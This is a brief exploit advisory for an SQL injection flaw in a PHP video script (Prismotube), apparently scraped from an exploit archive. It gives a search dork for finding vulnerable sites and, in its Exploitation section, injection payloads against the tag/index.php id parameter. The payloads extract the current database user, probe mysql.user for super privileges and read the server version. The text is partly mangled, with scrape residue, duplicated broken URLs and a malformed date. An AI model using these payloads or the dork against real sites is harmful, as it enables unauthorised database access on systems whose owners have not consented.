32 lines
No EOL
1.1 KiB
Text
32 lines
No EOL
1.1 KiB
Text
######################################################
|
||
# Exploit Title: php video script SQL Injection Vulnerability
|
||
# Date: 2011-25-11
|
||
# Author: longrifle0x
|
||
# Home page: www.security-research.ge
|
||
# software: PHP video script
|
||
# Download:http://www.alurian.com/php-video-script/
|
||
# Tools: SQLMAP
|
||
# Drok: Copyright <20> PHP Video Script powered by Prismotube All Rights Reserved
|
||
######################################################
|
||
|
||
*DESCRIPTION
|
||
Discovered a vulnerability in video_tags,
|
||
|
||
vulnerability is SQL injection.
|
||
|
||
*Exploitation*
|
||
|
||
link: http://localhost:80/tag <http://localhost/tag>
|
||
|
||
vulnerability link: http://localhost:80/tag <http://localhost/tag>'
|
||
|
||
http://localhost:80/tag'/index.php?id=1
|
||
<http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()
|
||
|
||
http://localhost:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE
|
||
<http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN
|
||
((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y')
|
||
THEN 1 ELSE 0 END)
|
||
|
||
http://localhost:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)
|
||
<http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)> |